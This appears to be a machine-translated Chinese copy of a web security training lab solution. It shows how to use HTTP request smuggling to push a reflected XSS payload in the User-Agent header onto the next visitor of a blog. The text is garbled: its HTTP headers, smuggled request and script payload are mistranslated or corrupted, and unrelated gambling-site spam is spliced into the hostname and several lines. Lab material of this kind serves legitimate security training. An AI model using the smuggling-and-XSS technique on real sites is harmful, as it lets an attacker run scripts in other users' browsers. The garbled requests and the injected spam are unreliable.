实验室:利用HTTP请求走私以交付反映的XSS
从业者
该实验室涉及前端和后端服务器,并且前端服务器不支持块状编码。
该应用程序也很容易受到影响反映XSS通过用户代理
标题。
要解决实验警报(1)
。
笔记
实验室模拟受害者用户的活动。您向实验室提出的每几个帖子请求,受害者用户都会提出自己的请求。您可能需要几次重复攻击,以确保受害者用户的要求根据需要出现。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
解决方案
- 访问博客文章,然后将请求发送给Burp Repeater。
- 观察评论表格包含您的
用户代理
隐藏输入中的标题。
将XSS有效载荷注入用户代理
标题并观察到它得到了反映:
“/> <脚本>警报(1)
将此XSS请求走私到后端服务器,以便利用下一个访问者:
post /http /1.1主机:您的lab-id.web-secbeplay体育能用吗urity-academy.net content-type:application /x-www-form-urlencoded content-engength:150传输编码:块0 get /post?post?postid = =5 http/1.1用户代理:a“/> content-type:application/x-www-form-urlencoded content-Length:5 x = 1
笔记
请注意,目标用户只会间歇性地浏览该网站,因此您可能需要在成功之前几次重复此攻击。beplay体育能用吗
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)